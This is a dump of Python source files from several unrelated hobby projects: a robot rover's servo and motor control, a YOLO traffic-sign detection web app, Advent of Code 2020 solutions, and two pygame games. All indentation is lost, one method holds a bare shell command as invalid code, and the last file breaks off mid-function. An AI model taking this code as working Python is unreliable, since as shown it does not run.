servo_max = 650.0 # Max pulse length out of 4096
pwm.set_pwm_freq(60)
def gotMessage(data):
jsonData = json.loads(data)
if "arm" in jsonData:
arm = jsonData["arm"]
helper = Helper()
if "1" in arm:
pwm.set_pwm(4, 0, int(helper.getPulseFromAngle(arm["1"], servo_min, servo_max)))
if "2" in arm:
pwm.set_pwm(5, 0, int(helper.getPulseFromAngle(arm["2"], servo_min, servo_max)))
if "3" in arm:
pwm.set_pwm(6, 0, int(helper.getPulseFromAngle(arm["3"], servo_min, servo_max)))
if "4" in arm:
pwm.set_pwm(7, 0, int(helper.getPulseFromAngle(arm["4"], servo_min, servo_max)))
while True:
data, addr = sock.recvfrom(com.udpBuffer)
print("received message: %s" % data)
gotMessage(data)
```
#### File: software/rover/Helper.py
```python
class Helper:
def findI2C(self):
i2cdetect -y
#i2cdetect -y 1
def getPulseFromAngle(self, angle, servo_min, servo_max):
#print("Helper getPulseFromAngle angle: %f - %f - %f" % (angle, servo_min, servo_max))
maxRange = servo_max - servo_min
#print("Helper getPulseFromAngle maxRange: %f" % maxRange)
partAngle = (angle * 1.0) / 180
#print("Helper getPulseFromAngle partAngle: %f" % partAngle)
angleMultiply = partAngle * maxRange
#print("Helper getPulseFromAngle angleMultiply: %f" % angleMultiply)
pulse = angleMultiply + servo_min
#print("Helper getPulseFromAngle: %f" % pulse)
return pulse
```
#### File: software/rover/MotorDriver.py
```python
MotorDriverDirection = [
'forward',
'backward',
]
class MotorDriver():
def __init__(self):
self.PWMA = 0
self.AIN1 = 1
self.AIN2 = 2
self.PWMB = 5
self.BIN1 = 3
self.BIN2 = 4
def MotorRun(self, pwm, motor, index, speed):
if speed > 100:
return
if(motor == 0):
pwm.setDutycycle(self.PWMA, speed)
if(index == MotorDriverDirection[0]):
pwm.setLevel(self.AIN1, 0)
pwm.setLevel(self.AIN2, 1)
else:
pwm.setLevel(self.AIN1, 1)
pwm.setLevel(self.AIN2, 0)
else:
pwm.setDutycycle(self.PWMB, speed)
if(index == MotorDriverDirection[0]):
pwm.setLevel(self.BIN1, 0)
pwm.setLevel(self.BIN2, 1)
else:
pwm.setLevel(self.BIN1, 1)
pwm.setLevel(self.BIN2, 0)
def MotorStop(self, pwm, motor):
if (motor == 0):
pwm.setDutycycle(self.PWMA, 0)
else:
pwm.setDutycycle(self.PWMB, 0)
```
#### File: software/rover/steer.py
```python
from __future__ import division
from threading import Thread
import sys
import socket
import json
import time
import math
from time import sleep
import Adafruit_PCA9685
from Communication import Communication
from Communicator import Communicator
from Helper import Helper
com = Communication("steer")
sock = com.getSocket()
sock.bind((com.ip, com.getPortForSteer()))
#### Servo
pwm = Adafruit_PCA9685.PCA9685(address=0x40)
servo_min = 150.0 # Min pulse length out of 4096
servo_max = 650.0 # Max pulse length out of 4096
pwm.set_pwm_freq(60)
class SteerReactor(Thread):
helper = Helper()
steerFrontLeft = 85
steerFrontRight = 85
steerBackLeft = 85
steerBackRight = 85
def __init__(self):
Thread.__init__(self)
self.daemon = True
self.start()
def run(self):
while True:
pwm.set_pwm(0, 0, int(self.helper.getPulseFromAngle(self.steerFrontLeft, servo_min, servo_max)))
pwm.set_pwm(4, 0, int(self.helper.getPulseFromAngle(self.steerFrontRight, servo_min, servo_max)))
pwm.set_pwm(8, 0, int(self.helper.getPulseFromAngle(self.steerBackLeft, servo_min, servo_max)))
pwm.set_pwm(12, 0, int(self.helper.getPulseFromAngle(self.steerBackRight, servo_min, servo_max)))
sleep(0.02)
def parseMessage(self,msg):
jsonData = json.loads(msg)
if "steer" in jsonData:
steer = jsonData["steer"]
if "fl" in steer:
if "fr" in steer:
if "bl" in steer:
if "br" in steer:
self.steerFrontLeft = steer["fl"]
self.steerFrontRight = steer["fr"]
self.steerBackLeft = steer["bl"]
self.steerBackRight = steer["br"]
runner = SteerReactor()
Communicator(sock, runner)
while True:
pass
```
|
{
"source": "jeaneudesAyilo/new-hands-on-2021",
"score": 2
}
|
#### File: app/apps/app_detection.py
```python
import base64
import cv2
import io
import os
import dash
import dash_core_components as dcc
import dash_html_components as html
import dash_bootstrap_components as dbc
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import PIL
import plotly.express as px
import sys
import tensorflow as tf
import yaml
from dash.dependencies import Input,State, Output
from PIL import Image
sys.path.insert(1, "C:/Users/jeane/Documents/new-hands-on-2021/notebooks/yolov3")
from configs import *
import yolov4
from yolov4 import Create_Yolo
from utils import load_yolo_weights, detect_image
yolo = Create_Yolo(input_size=YOLO_INPUT_SIZE, CLASSES=TRAIN_CLASSES)
yolo.load_weights("C:/Users/jeane/Documents/new-hands-on-2021/notebooks/checkpoints/yolov3_custom")
def fig_to_uri(in_fig, close_all=True, **save_args):
# type: (plt.Figure) -> str
"""
Save a figure as a URI
:param in_fig:
:return:
"""
out_img = io.BytesIO()
in_fig.savefig(out_img, format='png', **save_args)
if close_all:
in_fig.clf()
plt.close('all')
out_img.seek(0) # rewind file
encoded = base64.b64encode(out_img.read()).decode("ascii").replace("\n", "")#
return "data:image/png;base64,{}".format(encoded)
from app import app
layout = html.Div([
html.Hr(),
dbc.Toast(
[html.P(" ", className="mb-0")],
header="DETECTION DES PANNEAUX DE SIGNALISATION",
style={
"text-align": "center",
"background-color": ""
},
),
dcc.Upload(
id='bouton-chargement_2',
children=html.Div([
'Cliquer-déposer ou ',
html.A('sélectionner une image')
]),
style={
'width': '50%',
'height': '60px',
'lineHeight': '60px',
'borderWidth': '1px',
'borderStyle': 'dashed',
'borderRadius': '5px',
'textAlign': 'center',
'margin': '10px',
'margin' : '10px 10px 50px 300px'
}
),
html.Div(id='detection',children =[]),
dcc.Link("Aller à l'app de reconnaisance", href='/apps/recognition'),html.Br(),
dcc.Link("Accueil", href='/apps/home')
])
@app.callback(Output('detection', 'children'),
[Input("bouton-chargement_2",'contents'),
])
def display_detetion(contents):
if contents!=None:
content_type, content_string = contents.split(',')
image = detect_image(yolo, image_path = content_string,type_image_path = "base64_string", output_path = "", input_size=YOLO_INPUT_SIZE, show=False, CLASSES=TRAIN_CLASSES, rectangle_colors=(255,0,0))
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
fig, ax = plt.subplots(1,1,figsize=(10,6))
ax.imshow(image)
ax.axis('off')
plt.imshow(image)
out_url = fig_to_uri(fig)
return html.Div([
html.Hr(),
html.Img(src = out_url),dcc.Markdown('''**prohibitory = [0, 1, 2, 3, 4, 5, 7, 8, 9, 10, 15, 16]**
0: 'Speed limit (20km/h)' ;
1: 'Speed limit (30km/h)' ;
2: 'Speed limit (50km/h)' ;
3: 'Speed limit (60km/h)' ;
4: 'Speed limit (70km/h)' ;
5: 'Speed limit (80km/h)' ;
7: 'Speed limit (100km/h)' ;
8: 'Speed limit (120km/h)' ;
9: 'No passing' ;
10: 'No passing veh over 3.5 tons' ;
15: 'No vehicles' ;
16: 'Veh > 3.5 tons prohibited'
**mandatory = [33, 34, 35, 36, 37, 38, 39, 40]**
33: 'Turn right ahead' ;
34: 'Turn left ahead' ;
35: 'Ahead only' ;
36: 'Go straight or right' ;
37: 'Go straight or left' ;
38: 'Keep right' ;
39: 'Keep left' ;
40: 'Roundabout mandatory'
**danger = [11, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31]**
11: 'Right-of-way at intersection' ;
18: 'General caution' ;
19: 'Dangerous curve left' ;
20: 'Dangerous curve right' ;
21: 'Double curve' ;
22: 'Bumpy road' ;
23: 'Slippery road' ;
24: 'Road narrows on the right' ;
25: 'Road work' ;
26: 'Traffic signals' ;
27: 'Pedestrians' ;
28: 'Children crossing' ;
29: 'Bicycles crossing' ;
30: 'Beware of ice/snow' ;
31: 'Wild animals crossing'
**other = [6,12,13,14,17,32,41,42]**
6: 'End of speed limit (80km/h)' ;
12: 'Priority road' ;
13: 'Yield' ;
14: 'Stop' ;
17: 'No entry' ;
32: 'End speed + passing limits' ;
41: 'End of no passing' ;
42: 'End no passing veh > 3.5 tons'
''')])
else :
return
```
|
{
"source": "JeanExtreme002/Advent-of-Code",
"score": 4
}
|
#### File: 2020/day-10/solution.py
```python
def connect_adapters(adapters):
"""
Connect all adapters and return the device's built-in joltage adapter rating and all differences found.
"""
differences = [0, 0, 1]
current_adapter = 0
# Organize the list.
adapters.sort()
for index in range(len(adapters)):
# Get the difference between the current adapter and the next adapter.
difference = get_difference(current_adapter, adapters[index])
if not difference: return
differences[difference - 1] += 1
current_adapter = adapters[index]
return current_adapter + 3, differences
def get_difference(first_adapter, second_adapter):
"""
If the connection between the adapters is valid, the joltage difference is returned.
"""
difference = second_adapter - first_adapter
return difference if difference in [1, 2, 3] else None
# Get data from file.
with open("input.txt") as file:
data = [int(line) for line in file.readlines()]
# Get the device's built-in joltage adapter rating and all the differences found.
adapter, differences = connect_adapters(data)
first_part_result = differences[0] * differences[-1]
print("First Part:", first_part_result)
```
#### File: 2020/day-3/solution.py
```python
def get_count(array, value, step_x = 1, step_y = 1):
"""
Return the number of times a value appears in a matrix.
"""
x, count = 0, 0
# Get the size of the list.
height, width = len(array), len(array[0])
# Go through each row of the array.
for y in range(0, height, step_y):
# Check whether the value has been found.
if data[y][x] == value: count += 1
x += step_x
# Check if the X is greater than the width. If so, the width
# will be subtracted from the X to continue the walk.
if x >= width: x -= width
return count
# Get data from file.
with open("input.txt") as file:
data = [line.strip() for line in file.readlines()]
slopes = ((1, 1), (3, 1), (5, 1), (7, 1), (1, 2))
final_result = 1
# Go through each slope to get the tree count.
for right, down in slopes:
# Get the tree count and multiply the final result by it.
count = get_count(data, "#", right, down)
final_result *= count
# Show the result of the current slope.
print("Slope [{}, {}] = {} trees found.".format(right, down, count))
# Show the final result (second part).
print("Final Result:", final_result)
```
#### File: 2020/day-6/solution.py
```python
def get_chars(from_ = "a", to = "z"):
"""
Return a list of characters.
"""
return [chr(i) for i in range(ord(from_), ord(to) + 1)]
def get_answers_count(group):
"""
Return the number of answers for each question (a-z).
"""
answers_count = []
for char in get_chars():
# Get the number of times the character appears in the string.
answers_count.append(group.count(char))
# Return answers count.
return answers_count
def get_people_count(group):
"""
Return the number of people in a group.
"""
# Separate people from the group.
people = group.split("\n")
if "" in people: people.remove("")
# Return people count.
return len(people)
def get_questions_count(group):
"""
Return the number of questions answered.
"""
questions_count = 0
for char in get_chars():
# Check whether the character is in the string.
if char in group: questions_count += 1
# Return questions count.
return questions_count
# Get data from file.
with open("input.txt") as file:
data = file.read().split("\n\n")
first_part_count = 0
second_part_count = 0
# Get questions count from each group.
for group in data:
# Get answers count for each question.
answers_count = get_answers_count(group)
# Get people count.
people_count = get_people_count(group)
# Compute the number of questions answered.
first_part_count += get_questions_count(group)
# Compute the number of questions that everyone answered.
for number in answers_count:
if number == people_count: second_part_count += 1
# Show the results.
print("First Part: The sum of questions answered is {}.".format(first_part_count))
print("Second Part: The sum of questions that everyone answered is {}.".format(second_part_count))
```
|
{
"source": "JeanExtreme002/Aim-Coach",
"score": 3
}
|
#### File: JeanExtreme002/Aim-Coach/app.py
```python
from classes.App import App
from PIL.ImageColor import getrgb
import json
def setConfig():
"""
Function to create or receive program settings by a .json file.
"""
filename = "config.json"
indent = 4
# Dicionário com as configurações padrões do programa.
default_config = {
"Colors":{
"Final_scoreboard_background_color":App.FINAL_SCOREBOARD_BACKGROUND_COLOR,
"Scoreboard_color":App.SCOREBOARD_COLOR,
"Target_colors":App.TARGET_COLORS,
"Target_area_colors":App.TARGET_AREA_COLORS
},
"Extra difficulty settings":{
"Lives":App.LIVES,
"Missing_shots_decreases_life":App.MISSING_SHOTS_DECREASES_LIFE,
},
"Performance":{
"Frames_per_second":App.FRAMES_PER_SECOND,
"Sounds_buffer":App.SOUNDS_BUFFER
},
"Targets":{
"Target_limit_per_second":App.TARGET_LIMIT_PER_SECOND,
"Target_radius":App.TARGET_RADIUS,
"Targets_per_second":App.TARGETS_PER_SECOND,
"Target_speed":App.TARGET_SPEED
},
}
# Cria um dicionário com as configurações padrões para ser modificado
file_config = default_config.copy()
try:
file = open(filename)
config = json.loads(file.read())
file.close()
for mainKey in config.keys():
# Verifica se a chave principal é permitida
if not mainKey in default_config.keys():
continue
for key in config[mainKey].keys():
# Verifica se a chave é permitida
if not key in default_config[mainKey].keys():
continue
if "color" in key.lower():
if "colors" in key.lower():
colors_list = []
# Troca o nome das cores por tuplas em RGB
try:
for color in config[mainKey][key]:
if type(color) is str:
color = getrgb(color)
elif type(color) in [tuple,list]:
color = color
else: raise TypeError
colors_list.append(color)
file_config[mainKey][key] = colors_list.copy()
except: pass
continue
# Troca o nome da cor por uma tupla em RGB
try:
color = config[mainKey][key]
if type(color) is str:
color = getrgb(color)
elif type(color) in [tuple,list]:
color = color
else: raise TypeError
file_config[mainKey][key] = color
except:
continue
# Coloca a configuração do arquivo no dicionário
file_config[mainKey][key] = config[mainKey][key]
# Passa os valores do dicionário para a classe principal do programa como atributo
for mainKey in file_config.keys():
for key in file_config[mainKey].keys():
setattr(App,key.upper(),file_config[mainKey][key])
except:
file = open(filename,"w")
file.write(json.dumps(default_config,indent=indent))
file.close()
if __name__ == "__main__":
setConfig()
App().run()
```
#### File: Aim-Coach/classes/App.py
```python
from classes.Display import Display
from classes.FinalScoreboard import FinalScoreboard
from classes.Sounds import Sounds
from classes.TargetArea import TargetArea
from classes.Target import Target
from classes.Text import Text
from classes.Timer import Timer
from time import time
import pygame
class App(object):
"""
Main Class
"""
BORDER = 10
DISPLAY_COLOR = (100,100,100)
DISPLAY_GEOMETRY = [700,500]
DISPLAY_TITLE = "Aim Trainer"
FRAMES_PER_SECOND = 60
LIVES = 5
MISSING_SHOTS_DECREASES_LIFE = False
SCOREBOARD_AREA = 50
SCOREBOARD_COLOR = (255,255,255)
SCOREBOARD_FONT = ('Comic Sans MS', 21)
SCOREBOARD_FORMAT = "Hits: %i Accuracy: %.1f%% FPS: %i Targets: %.2f/s Lives: %i"
SCOREBOARD_LOCATION = [BORDER+1,10]
SOUNDS_BUFFER = 64
TARGET_ADD_TIME = 0.2
TARGET_AREA_COLORS = [(128,128,128),(148,148,148)]
TARGET_BORDER = 0
TARGET_AREA_GEOMETRY = [0+BORDER,SCOREBOARD_AREA+BORDER,DISPLAY_GEOMETRY[0]-BORDER,DISPLAY_GEOMETRY[1]-BORDER]
TARGET_COLORS = [(255,0,0),(255,255,255)]
TARGET_LIMIT_PER_SECOND = None
TARGET_RADIUS = 40
TARGETS_PER_SECOND = 1.8
TARGET_SPEED = 0.4
FINAL_SCOREBOARD_BACKGROUND_COLOR = (255,255,255)
FINAL_SCOREBOARD_BORDER = 5
FINAL_SCOREBOARD_BORDER_COLOR = (139,69,19)
FINAL_SCOREBOARD_FONT = ("Arial",40)
FINAL_SCOREBOARD_GEOMETRY = [TARGET_AREA_GEOMETRY[0]+50,TARGET_AREA_GEOMETRY[1]+50,TARGET_AREA_GEOMETRY[2]-50,TARGET_AREA_GEOMETRY[3]-50]
FINAL_SCOREBOARD_TEXT_COLOR = (80,80,80)
def __init__(self):
self.sounds = Sounds(self.SOUNDS_BUFFER)
pygame.init()
self.display = Display(
*self.DISPLAY_GEOMETRY,
self.DISPLAY_TITLE,
self.DISPLAY_COLOR
)
self.__surface = self.display.getSurface()
self.finalScoreboard = FinalScoreboard(
self.__surface,
*self.FINAL_SCOREBOARD_GEOMETRY,
self.FINAL_SCOREBOARD_FONT,
self.FINAL_SCOREBOARD_BORDER,
self.FINAL_SCOREBOARD_BORDER_COLOR,
self.FINAL_SCOREBOARD_TEXT_COLOR,
self.FINAL_SCOREBOARD_BACKGROUND_COLOR,
self.TARGET_COLORS
)
self.scoreboardText = Text(
self.__surface,
*self.SCOREBOARD_LOCATION,
text_font=self.SCOREBOARD_FONT,
text_color=self.SCOREBOARD_COLOR
)
self.targetArea = TargetArea(
self.__surface,
*self.TARGET_AREA_GEOMETRY,
self.TARGET_AREA_COLORS
)
self.__timer = Timer()
self.__clock = pygame.time.Clock()
def captureEvents(self):
"""
Method for capturing events and taking action based on them.
"""
for event in pygame.event.get():
# Verifica se houve um evento para fechar a janela do programa.
if event.type == pygame.QUIT:
self.__stop = True
break
# Verifica se uma tecla foi pressionada.
if event.type == pygame.KEYDOWN:
# Se a tecla pressionada foi "Esc", o programa será fechado.
if event.key == pygame.K_ESCAPE:
self.__stop = True
break
# Se a tecla pressionada foi "Enter" ou "Space", será criada uma nova
# sessão caso o usuário esteja na tela de fim de jogo.
elif event.key in [pygame.K_RETURN,pygame.K_SPACE]:
if not self.__start:
self.__start = True
# Se o botão "1" do mouse foi pressionado, será efetuado um disparo.
if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:
# Se uma sessão estiver em execução, será executado um som de tiro.
# Senão, o som a ser executado será de uma arma sem munição.
if self.__start:
self.sounds.playSound(self.sounds.shooting_sound)
else:
self.sounds.playSound(self.sounds.without_ammunition_sound)
continue
# Verifica se o tiro acertou algum alvo.
for target in self.__targets.copy():
# Obtém a posição (x,y) do tiro em relação ao alvo
hit = target.checkHit()
# Se acertou, o número de acertos aumentará e o alvo será removido.
if hit:
self.sounds.playSound(self.sounds.metal_hit_sound)
self.__shots.append(hit)
self.__targets.remove(target)
self.__hits += 1
return
# Se nenhum alvo foi acertado, o número de falhas aumentará e caso
# a opção para perda de vida por tiros perdidos esteja ativada,
# o usuário perderá uma vida na sessão.
if self.MISSING_SHOTS_DECREASES_LIFE:
self.__lives -= 1
self.__failures += 1
def createTarget(self):
"""
Method to create a target within the screen.
"""
target = Target(
surface = self.__surface,
area_geometry = self.TARGET_AREA_GEOMETRY,
radius=self.TARGET_RADIUS,
target_colors=self.TARGET_COLORS
)
self.__targets.append(target)
def gameOver(self):
"""
Method for creating an endgame screen.
"""
self.__start = False
# Obtém as informações da última sessão para inserir os dados no placar final.
hits = self.__hits
accuracy = FinalScoreboard.getAccuracy(self.__hits+self.__failures,self.__hits)
targets_per_second = self.__target_per_second
time = self.__timer.getTime()
shots = self.__shots.copy()
# Enquanto o usuário não tentar fechar o programa ou pressionar uma tecla para criar
# uma nova sessão, a tela de fim de jogo será desenhada.
while not self.__stop and not self.__start:
self.captureEvents()
self.display.drawDisplay()
self.targetArea.drawArea()
# Coloca instrução no área do placar para continuar, criando uma nova sessão.
self.scoreboardText.setText('GAME OVER: Click "Enter" or "Space" to continue.')
self.scoreboardText.drawText()
self.finalScoreboard.drawFinalScoreboard(hits,accuracy,targets_per_second,time,shots)
self.__clock.tick(self.FRAMES_PER_SECOND)
pygame.display.flip()
# Se o usuário pressionar uma botão para sair do programa, o mesmo fechará.
# Se o usuário pressionar uma tecla para continuar, uma nova sessão será criada.
if self.__stop:
pygame.quit()
else: self.run()
def run(self):
"""
Method to start a new session.
"""
self.__failures = 0
self.__hits = 0
self.__stop = False
self.__targets = []
self.__shots = []
self.__lives = self.LIVES
self.__target_per_second = self.TARGETS_PER_SECOND
self.__start = True
# Define a fonte para o placar
self.scoreboardText.setFont(self.SCOREBOARD_FONT)
# Inicia o cronômetro
self.__timer.start()
last_time_to_create_target = time()
last_time_to_add_tps = time()
# Enquanto o usuário não tentar fechar o programa e possuir vidas, a sessão
# continuará a ser executada.
while not self.__stop and self.__lives > 0:
self.captureEvents()
# Cria um novo alvo com base na quantidade de alvos por segundo.
if time() - last_time_to_create_target >= 1/self.__target_per_second:
self.createTarget()
last_time_to_create_target = time()
# Aumenta a quantidade de alvos por segundos.
if time() - last_time_to_add_tps >= self.TARGET_ADD_TIME:
if not self.TARGET_LIMIT_PER_SECOND or self.TARGET_LIMIT_PER_SECOND > self.__target_per_second:
self.__target_per_second += 1/self.__target_per_second/100
last_time_to_add_tps = time()
self.update()
# Se o programa saiu do "while" devido a chamada de um evento
# para fechar o programa, o programa será finalizado.
# Se este não foi o caso, quer dizer que a sessão atual encerrou e irá
# direto para a tela de fim de jogo.
if self.__stop:
pygame.quit()
else:
self.gameOver()
def setScore(self):
"""
Method for inserting updated information in the scoreboard.
"""
hits = self.__hits
accuracy = FinalScoreboard.getAccuracy(self.__hits+self.__failures,self.__hits)
fps = self.__clock.get_fps()
targets_per_second = self.__target_per_second
self.scoreboardText.setText(self.SCOREBOARD_FORMAT%(hits,accuracy,fps,targets_per_second,self.__lives))
def targetAnimation(self):
"""
Method for generating target animation.
"""
targets = self.__targets.copy()
targets.reverse()
for target in targets:
try:
# Caso não seja possível aumentar ainda mais o alvo,
# seu tamanho diminuirá.
if target.increase(self.TARGET_SPEED) == -1:
target.decreases(self.TARGET_SPEED)
target.drawTarget(border=self.TARGET_BORDER)
# Caso o alvo tenha diminuido até o limite, ele será removido
# e um som de alvo perdido será executado.
except ValueError:
self.sounds.playSound(self.sounds.target_loss_sound)
self.__targets.remove(target)
self.__lives -= 1
def update(self):
"""
Method for updating the graphics part of the program.
"""
self.setScore()
self.display.drawDisplay()
self.scoreboardText.drawText()
self.targetArea.drawArea()
self.targetAnimation()
self.__clock.tick(self.FRAMES_PER_SECOND)
pygame.display.flip()
```
#### File: Aim-Coach/classes/Sounds.py
```python
from pygame import mixer
from os.path import join
from os import getcwd
class Sounds(object):
"""
Class for playing program sounds.
"""
__cwd = getcwd()
metal_hit_sound = 0
shooting_sound = 1
target_loss_sound = 2
without_ammunition_sound = 3
metal_hit_sound_path = join(__cwd,"sounds","metal_hit.wav")
shooting_sound_path = join(__cwd,"sounds","shooting.wav")
target_loss_sound_path = join(__cwd,"sounds","target_loss.wav")
without_ammunition_sound_path = join(__cwd,"sounds","without_ammunition.wav")
def __init__(self,buffer=64):
# The "buffer" parameter must have a low value to decrease latency.
mixer.init(buffer=buffer)
self.__sounds = {}
self.__sounds[self.metal_hit_sound] = mixer.Sound(self.metal_hit_sound_path)
self.__sounds[self.shooting_sound] = mixer.Sound(self.shooting_sound_path)
self.__sounds[self.target_loss_sound] = mixer.Sound(self.target_loss_sound_path)
self.__sounds[self.without_ammunition_sound] = mixer.Sound(self.without_ammunition_sound_path)
def playSound(self,sound):
"""
Method for playing specific loaded sounds.
The "sound" parameter must be a Sounds attribute where the name ends with "sound".
"""
if sound in self.__sounds:
self.__sounds[sound].play()
@staticmethod
def playSoundFrom(filename):
"""
Method to play sound from a file.
"""
mixer.music.load(filename)
mixer.music.play()
```
|
{
"source": "JeanExtreme002/Angle-Gauge",
"score": 3
}
|
#### File: JeanExtreme002/Angle-Gauge/util.py
```python
import math
def getHypotenuse(b,c):
"""
Retorna a hipotenusa de um triângulo retângulo
utilizando os seus catetos.
Fórmula: a² = b² + c²
"""
return ((b**2) + (c**2)) ** 0.5
def cos2degrees(x):
"""
Retorna o cosseno em graus.
"""
return math.degrees(math.acos(x))
```
|
{
"source": "JeanExtreme002/Asteroids-Escape",
"score": 3
}
|
#### File: classes/app/__init__.py
```python
from classes.app.mainMenu import MainMenu
from classes.app.system import System
from classes.entities.asteroids import Asteroids
from classes.entities.spaceship import Spaceship
from classes.util.background import Background
from classes.util.button import Button
from classes.util.text import Text
import pygame
class App(System):
FRAMES_PER_SECOND = 60
MARGIN = (50,100,50,50)
WINDOW_GEOMETRY = (900,600)
WINDOW_TITLE = "Asteroids Escape"
def __init__(self):
try:
super().__init__(self.WINDOW_GEOMETRY, self.WINDOW_TITLE)
except FileNotFoundError as error:
raise error
self.__window = pygame.display.get_surface()
self.__bigTitleText = Text(self.__window, ( self.FONTS["autumn"], 100 ))
self.__infoText = Text(self.__window, (self.FONTS["autumn"],35) )
self.__titleText = Text(self.__window, (self.FONTS["space_age"],50) )
self.__startButton = Button(self.__window, (self.IMAGES["start_button"], self.IMAGES["active_start_button"]))
self.asteroids = Asteroids(self.__window, self.IMAGES["asteroid"], self.MARGIN)
self.background = Background(self.__window, self.IMAGES["background"])
self.spaceship = Spaceship(self.__window, self.IMAGES["spaceship"], self.IMAGES["explosion"], self.MARGIN)
self.__reset()
def __captureEvents(self):
"""
Método para realizar ações com base nos eventos.
"""
for event in pygame.event.get():
if event.type == pygame.BUTTON_X1:
if self.__startButton.pressed:
self.__playing = True
elif event.type == pygame.QUIT:
self.__stop = True
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
self.__stop = True
# Pausa ou despausar jogo.
elif event.key == pygame.K_p and self.__playing:
self.__pause = not self.__pause
if self.__pause:
self.sounds.pause()
else:
self.sounds.unpause()
# Inicia o jogo.
elif event.key == pygame.K_RETURN:
self.__playing = True
def __collided(self):
"""
Método para verificar se a nave colidiu com os asteróides.
"""
for asteroid in self.asteroids:
if asteroid in self.spaceship:
return True
return False
def __reset(self):
"""
Método para resetar o jogo.
"""
self.__asteroids_limit = 2
self.__distance = 400
self.__fps = self.FRAMES_PER_SECOND
self.__game_over = False
self.__pause = False
self.__playing = False
self.__score = 0
self.__stop = False
self.__time = None
self.__velocity = 5
# Apaga todos os asteróides, centraliza a nave na tela e reinicia o cronômetro.
self.asteroids.clear()
self.spaceship.draw(self.WINDOW_GEOMETRY[0] // 2, self.WINDOW_GEOMETRY[1] // 2)
self.stopwatch.start()
def run(self):
"""
Método para inicializar o jogo.
"""
# Cria o menu inicial e aguarda o usuário apertar o botão "start" ou fechar o programa.
mainMenu = MainMenu(self.__window, self.spaceship, self.__titleText, self.__startButton)
while not self.__playing and not self.__stop:
self.__captureEvents()
if self.__playing: break
self.__update()
mainMenu.draw()
self.updateWindow()
self.clock.tick(self.FRAMES_PER_SECOND)
# Fecha a janela caso o usuário queira sair.
if self.__stop:
pygame.quit()
return
# Inicia a sessão.
self.__start()
pygame.quit()
@property
def score(self):
return self.__score
def __start(self):
"""
Método para iniciar um novo jogo.
"""
# Reseta os dados do jogo anterior.
self.__reset()
self.__playing = True
# Reproduz uma música de fundo.
self.sounds.play(self.SOUNDS["music"], loop = -1)
# Esconde o cursor durante o jogo e define a posição do mouse no centro da tela.
self.spaceship.cursor(False)
self.spaceship.centralize()
while not self.__stop:
self.__time = self.stopwatch.get()
# Verifica se a nave colidiu.
if self.__collided(): break
self.__captureEvents()
# Atualiza o jogo.
self.__update(updateEntities = True)
self.updateWindow()
# Se o jogo estiver pausado, o mouse ficará centralizado
# na nave e nenhum objeto poderá se mover.
if self.__pause:
self.spaceship.centralize()
continue
# Caso o último asteróide criado tenha uma distância X maior ou igual
# do que o seu ponto de criação, um novo asteróide será criado.
if self.asteroids.empty or self.WINDOW_GEOMETRY[0] - self.asteroids[-1].x > self.__distance:
self.asteroids.createNewAsteroid((1, self.__asteroids_limit))
if self.__distance > 200:
self.__distance -= 10
# Move os asteróides e a nave.
self.asteroids.move(self.__velocity, self.__increaseScore)
self.spaceship.move()
if self.__stop: return
# Reproduz som de explosão e gera sua animação.
self.sounds.play(self.SOUNDS["explosion"])
self.spaceship.explode(lambda: self.__update(updateEntities = True))
self.__captureEvents()
self.spaceship.cursor(True)
self.__playing = False
self.__game_over = True
# Aguarda o usuário apertar o botão "start" ou fechar o programa.
while not self.__stop and not self.__playing:
self.__captureEvents()
self.__update(updateEntities = True)
self.__startButton.draw(self.WINDOW_GEOMETRY[0] // 2, self.WINDOW_GEOMETRY[1] // 100 * 80)
self.updateWindow()
# Começa um novo jogo.
if self.__playing:
self.__start()
def __increaseScore(self):
"""
Método para aumentar a pontuação do usuário.
"""
self.__score += 1
if self.__score % 10 == 0:
self.__increaseDifficulty()
def __increaseDifficulty(self):
"""
Método para aumentar o nível de dificuldade do jogo.
"""
# Aumenta o FPS até no máximo 200 a cada 10 pontos obtidos.
if self.__score % 10 == 0 and self.__fps < 200:
self.__fps += 10
# Aumenta a velocidade ao obter 10 pontos.
if self.__score == 10:
self.__velocity += 1
# A cada 40 pontos obtidos, a velocidade aumentará em 1 pixel.
if self.__score % 20 == 0 and self.__velocity < 15:
self.__velocity += 1
def __update(self, updateEntities = False):
"""
Método para atualizar a tela do jogo.
"""
# Limpa a tela e deseja um plano de fundo.
# Se o usuário não estiver jogando no momento, o plano de fundo será estático.
self.__window.fill([0,0,0])
self.background.draw( 2 if self.__playing and not self.__pause else 0 )
# Atualiza a entidades.
if updateEntities:
self.spaceship.draw(self.spaceship.x, self.spaceship.y)
self.asteroids.draw()
if self.__pause:
self.__bigTitleText.draw("PAUSED", self.WINDOW_GEOMETRY[0] // 2, 100, color = [255,0,0], outline = [0,0,0])
elif self.__game_over:
self.__bigTitleText.draw("GAME OVER", self.WINDOW_GEOMETRY[0] // 2, 100, color = [255,0,0], outline = [0,0,0])
# Mostra a pontuação e o tempo de jogo.
if self.__playing or self.__game_over:
self.__infoText.draw("Score: %i" % self.__score, 30, 10, place = "left")
self.__infoText.draw("Time: %s" % self.__time, self.WINDOW_GEOMETRY[0] - 30, 10, place = "right")
self.clock.tick(self.FRAMES_PER_SECOND)
@property
def window(self):
return self.window
```
#### File: classes/entities/asteroids.py
```python
from pygame import image
import random
class Asteroids(object):
__asteroids = []
__index = 0
def __getitem__(self,index):
return self.__asteroids[index]
def __init__(self, window, image_fn, margin = (0,0)):
self.__window = window
self.__window_width, self.__window_height = self.__window.get_size()
self.__image = image.load(image_fn)
self.__WIDTH, self.__HEIGHT = self.__image.get_size()
self.__margin = margin
def __iter__(self):
return self
def __next__(self):
if self.__index >= len(self.__asteroids):
self.__index = 0
raise StopIteration
else:
try:
return self.__asteroids[self.__index]
finally:
self.__index += 1
def clear(self):
self.__asteroids.clear()
def createNewAsteroid(self, amount = (1,1)):
# Obtém uma lista com todas as posições disponíveis para criar os asteróides.
start = self.__margin[0]
stop = self.__window_height - self.__margin[1] - self.height
pos_list = [ num for num in range(start, stop) ]
for i in range(random.randint(*amount)):
if not pos_list: break
# Obtém uma posição X e Y aleatóriamente.
pos_y = random.choice(pos_list)
pos_x = random.randint(self.__window_width + 50, self.__window_width + 50 + self.width)
# Remove as posições usadas pelo asteróide.
index = pos_list.index(pos_y)
part1 = 0 if index - self.height < 0 else index - self.height + 1
